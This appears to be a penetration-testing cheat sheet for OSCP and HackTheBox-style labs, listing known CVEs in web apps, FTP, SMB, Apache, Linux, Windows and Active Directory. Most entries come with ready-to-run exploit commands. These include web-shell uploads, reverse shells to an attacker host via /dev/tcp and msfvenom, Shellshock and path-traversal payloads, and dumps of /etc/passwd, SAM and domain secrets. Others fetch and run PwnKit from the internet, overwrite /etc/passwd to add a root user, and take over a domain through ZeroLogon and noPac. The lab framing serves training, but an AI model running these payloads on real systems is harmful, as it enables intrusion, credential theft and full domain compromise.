Known vulnerabilities commonly encountered on OSCP-style boxes, Proving Grounds, and HackTheBox. Organized by category with version ranges, PoC links, and quick usage examples.
How to use this page:
Identify the service and version on your target
Find it in the table below
Follow the PoC link or use the command provided
Always check SearchSploit first:
searchsploit <service> <version>
searchsploit -m <exploit_id> # Mirror exploit to current directory
CVE Affected Version Description PoC
CVE-2020-25213 WP File Manager < 6.9 Unauthenticated file upload RCE GitHub
CVE-2021-24145 Modern Events Calendar < 5.16.5 Authenticated file upload RCE ExploitDB
CVE-2022-0739 BookingPress < 1.0.11 Unauthenticated SQLi GitHub
CVE-2023-2732 MStore API < 3.9.3 Authentication bypass WPScan
# CVE-2020-25213 — WP File Manager unauthenticated upload
curl -F 'cmd=upload' -F 'target=l1_Lw' \
-F 'upload[]=@shell.php' \
http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
# Shell at: http://$IP/wp-content/plugins/wp-file-manager/lib/files/shell.php
CVE Affected Version Description PoC
CVE-2018-7600 Drupal < 7.58 / < 8.3.9 Drupalgeddon2 — Unauthenticated RCE GitHub
CVE-2018-7602 Drupal < 7.59 / < 8.5.3 Drupalgeddon3 — Authenticated RCE GitHub
CVE-2019-6340 Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10 REST module deserialization RCE GitHub
# CVE-2018-7600 — Drupalgeddon2 (most common)
python3 drupalgeddon2.py http://$IP/
# Metasploit:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS $IP
run
CVE Affected Version Description PoC
CVE-2015-8562 Joomla 1.5 - 3.4.5 Object injection RCE via HTTP headers GitHub
CVE-2017-8917 Joomla 3.7.0 SQLi in com_fields GitHub
CVE-2023-23752 Joomla 4.0.0 - 4.2.7 Unauthenticated information disclosure GitHub
# CVE-2023-23752 — Information disclosure (leaks DB creds)
curl -s "http://$IP/api/index.php/v1/config/application?public=true" | python3 -m json.tool
# CVE-2017-8917 — SQLi
sqlmap -u "http://$IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 -p list[fullordering] --dbs
CVE Affected Version Description PoC
CVE-2017-12617 Tomcat 7.0.0-7.0.81 / 8.5.0-8.5.22 PUT method RCE via JSP upload GitHub
CVE-2020-1938 Tomcat < 9.0.31 / < 8.5.51 / < 7.0.100 Ghostcat — AJP file read/RCE GitHub
CVE-2019-0232 Tomcat 7/8/9 on Windows with CGI CGI servlet command injection ExploitDB
# CVE-2020-1938 — Ghostcat (AJP port 8009)
python3 ajpShooter.py http://$IP:8009 /WEB-INF/web.xml read
# CVE-2017-12617 — PUT method JSP upload
curl -X PUT "http://$IP:8080/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
CVE Affected Version Description PoC
CVE-2019-9053 CMSMS < 2.2.10 Blind SQLi — Dumps admin credentials GitHub
python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt
CVE Affected Version Description PoC
CVE-2021-22205 GitLab 11.9 - 13.10.2 Unauthenticated RCE via image upload GitHub
CVE-2023-7028 GitLab 16.1 - 16.7.1 Account takeover via password reset GitHub
# CVE-2021-22205 — Unauthenticated RCE
python3 CVE-2021-22205.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"
CVE Affected Version Description PoC
CVE-2021-43798 Grafana 8.0.0 - 8.3.0 Unauthenticated arbitrary file read GitHub
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# Grab the database:
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db
CVE Affected Version Description PoC
CVE-2024-23897 Jenkins < 2.442 / LTS < 2.426.3 Arbitrary file read via CLI GitHub
CVE-2019-1003000 Script Security Plugin < 1.49 Sandbox bypass RCE ExploitDB
CVE-2018-1000861 Jenkins < 2.154 / LTS < 2.138.4 Unauthenticated RCE GitHub
# CVE-2024-23897 — File read via CLI
java -jar jenkins-cli.jar -s http://$IP:8080/ help "@/etc/passwd"
CVE Affected Version Description PoC
CVE-2019-15107 Webmin 1.890 - 1.920 Unauthenticated RCE via password_change.cgi GitHub
CVE-2012-2982 Webmin < 1.590 Authenticated RCE via file manager ExploitDB
# CVE-2019-15107 — Unauthenticated RCE
curl -sk "https://$IP:10000/password_change.cgi" \
-d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'
CVE Affected Version Description PoC
CVE-2020-14882 WebLogic 10.3.6 / 12.x / 14.x Unauthenticated RCE GitHub
CVE-2019-2725 WebLogic 10.3.6 / 12.1.3 Deserialization RCE GitHub
# CVE-2020-14882 — WebLogic unauthenticated RCE
curl "http://$IP:7001/console/css/%252e%252e%252fconsole.portal" \
-H "cmd: id"
CVE Affected Version Description PoC
CVE-2015-1397 Magento < 1.9.2.0 Shoplift SQLi — Create admin account ExploitDB
CVE-2022-24086 Magento 2.3.x / 2.4.x Template injection RCE GitHub
# CVE-2015-1397 — Shoplift (creates admin: forme/forme)
python2 shoplift.py http://$IP/
CVE Affected Version Description PoC
CVE-2011-2523 vsftpd 2.3.4 Backdoor — Shell on port 6200 Metasploit
CVE-2015-3306 ProFTPD 1.3.5 mod_copy — Unauthenticated file copy ExploitDB
CVE-2019-12815 ProFTPD < 1.3.5b / 1.3.6 mod_copy arbitrary file copy ExploitDB
# vsftpd 2.3.4 backdoor
nc $IP 21
USER test:)
PASS test
# Then: nc $IP 6200
# ProFTPD mod_copy
nc $IP 21
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/passwd.txt
CVE Affected Version Description PoC
MS17-010 Windows XP - Server 2016 EternalBlue — Unauthenticated RCE GitHub
CVE-2017-7494 Samba 3.5.0 - 4.6.4 SambaCry — RCE via writable share Metasploit
MS08-067 Windows XP / Server 2003 / Vista / 2008 NetAPI RCE — Classic exploit GitHub
# MS17-010 — EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 $IP
# Metasploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run
# CVE-2017-7494 — SambaCry
use exploit/linux/samba/is_known_pipename
set RHOSTS $IP
run
CVE Affected Version Description PoC
CVE-2018-15473 OpenSSH < 7.7 Username enumeration GitHub
CVE-2016-20012 OpenSSH < 8.2 Banner-based user enumeration ExploitDB
# CVE-2018-15473 — Username enumeration
python3 ssh_enum.py $IP -U users.txt
# Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers
CVE Affected Version Description PoC
CVE-2019-10149 Exim 4.87 - 4.91 "Return of the WIZard" — Unauthenticated RCE GitHub
CVE-2017-7692 SquirrelMail < 1.4.22 Authenticated RCE ExploitDB
# CVE-2019-10149 — Exim RCE
python3 raptor_exim_wiz.py -t $IP -p 25 -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"
CVE Affected Version Description PoC
CVE-2014-6271 Bash (via Apache CGI) Shellshock — RCE via HTTP headers ExploitDB
CVE-2021-41773 Apache 2.4.49 Path traversal + RCE GitHub
CVE-2021-42013 Apache 2.4.50 Path traversal + RCE (bypass of 41773 fix) GitHub
# Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh
# CVE-2021-41773 — Apache path traversal + RCE
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/bash" -d 'echo; id'
CVE Affected Version Description PoC
CVE-2017-7269 IIS 6.0 (Windows Server 2003) WebDAV buffer overflow RCE GitHub
MS15-034 IIS (HTTP.sys) Integer overflow — DoS / info disclosure ExploitDB
# CVE-2017-7269 — IIS 6.0 WebDAV
python2 iis6_exploit.py $IP 80 $LHOST 4444
# Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
CVE Affected Version Description PoC
CVE-2016-5195 Linux Kernel < 4.8.3 Dirty COW — Write to read-only files GitHub
CVE-2021-4034 Polkit (all major distros) PwnKit — pkexec local root GitHub
CVE-2021-3156 Sudo 1.8.2 - 1.9.5p1 Baron Samedit — Heap overflow root GitHub
CVE-2022-0847 Linux Kernel 5.8 - 5.16.11 Dirty Pipe — Overwrite read-only files GitHub
CVE-2022-2588 Linux Kernel < 5.19 Route4 use-after-free local root GitHub
CVE-2023-0386 Linux Kernel < 6.2 OverlayFS privilege escalation GitHub
CVE-2023-32233 Linux Kernel < 6.4 Netfilter nf_tables local root GitHub
# PwnKit (CVE-2021-4034) — Works on almost every unpatched Linux
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit
# Dirty COW (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword
# Baron Samedit (CVE-2021-3156)
# Check if vulnerable:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# Exploit:
python3 CVE-2021-3156.py
# Dirty Pipe (CVE-2022-0847)
gcc exploit.c -o exploit
./exploit /etc/passwd 1 $'\npiped:$1$piped$password:0:0::/root:/bin/bash\n'
su piped # password: password
CVE Affected Version Description PoC
CVE-2020-0787 Windows 10 / Server 2016-2019 BITS arbitrary file write → SYSTEM GitHub
CVE-2020-1472 Windows Server (Netlogon) ZeroLogon — Domain admin in seconds GitHub
CVE-2021-1675 Windows (Print Spooler) PrintNightmare — LPE / RCE to SYSTEM GitHub
CVE-2021-36934 Windows 10 (1809+) HiveNightmare — Read SAM as user GitHub
CVE-2022-26923 AD Certificate Services Certifried — Domain user to DA GitHub
MS16-032 Windows 7/8/10 / Server 2008-2012 Secondary Logon handle privesc ExploitDB
MS16-098 Windows 8.1 / Server 2012 Kernel exploit via RGNOBJ ExploitDB
# PrintNightmare (CVE-2021-1675)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'
# ZeroLogon (CVE-2020-1472) — Resets DC machine password
python3 zerologon_tester.py DC_NAME $DC_IP
python3 cve-2020-1472-exploit.py DC_NAME $DC_IP
impacket-secretsdump -no-pass -just-dc domain.local/DC_NAME\$@$DC_IP
# HiveNightmare (CVE-2021-36934) — Copy SAM as regular user
icacls C:\Windows\System32\config\SAM
# If readable:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# MS16-032
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
CVE Affected Version Description PoC
CVE-2020-1472 Windows Server (Netlogon) ZeroLogon — Reset DC machine account GitHub
CVE-2021-1675 Windows (Print Spooler) PrintNightmare — RCE as SYSTEM GitHub
CVE-2021-42278 + CVE-2021-42287 AD (all versions) noPac — Domain user to DA GitHub
CVE-2022-26923 AD Certificate Services Certifried — Machine account to DA GitHub
# noPac (CVE-2021-42278 + CVE-2021-42287) — User to DA
python3 noPac.py domain.local/user:'password' -dc-ip $DC_IP -dc-host DC01 --impersonate administrator -dump
# Certifried (CVE-2022-26923) — Via AD CS
certipy account create -u user@domain.local -p 'password' -dc-ip $DC_IP -user machine$ -dns dc.domain.local
certipy req -u machine$@domain.local -p 'password' -dc-ip $DC_IP -ca CORP-CA -template Machine
certipy auth -pfx dc.pfx -dc-ip $DC_IP
When you find a service version, follow this process:
1. searchsploit <service> <version> → Local exploit database
2. Google: "<service> <version> exploit" → Recent PoCs
3. Check this page → Curated OSCP-relevant CVEs
4. GitHub search: "CVE-YYYY-XXXXX" → Find PoC repos
5. HackTricks: book.hacktricks.wiki → Methodology + exploits